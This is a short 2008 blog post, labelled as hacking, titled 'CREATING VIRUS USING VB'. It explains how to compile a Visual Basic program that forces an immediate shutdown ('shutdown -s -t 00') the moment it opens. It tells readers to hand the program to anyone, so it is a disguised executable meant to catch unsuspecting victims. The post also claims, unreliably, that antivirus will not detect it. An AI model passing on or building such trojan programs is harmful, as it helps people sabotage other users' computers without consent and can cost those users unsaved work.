just install VB on ur computer
and use this code for shutting down a computer
without any prompt
this exe which will be made will not be deducted by any antivirus
because it uses DOS command
to shutdown
first of all open VB
and now choose
standard exe
just double click form
and code window will open
now type under
Private Sub Form_Load()
Shell ("shutdown -s -t 00")
End Sub
__________________________________
save it
and go to file
make .exe
and now give to anyone
as soon as he open the application
computer shuts down
CREATING VIRUS USING VB
Friday, June 27, 2008 at 10:45 PM Labels: { HACKING }
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment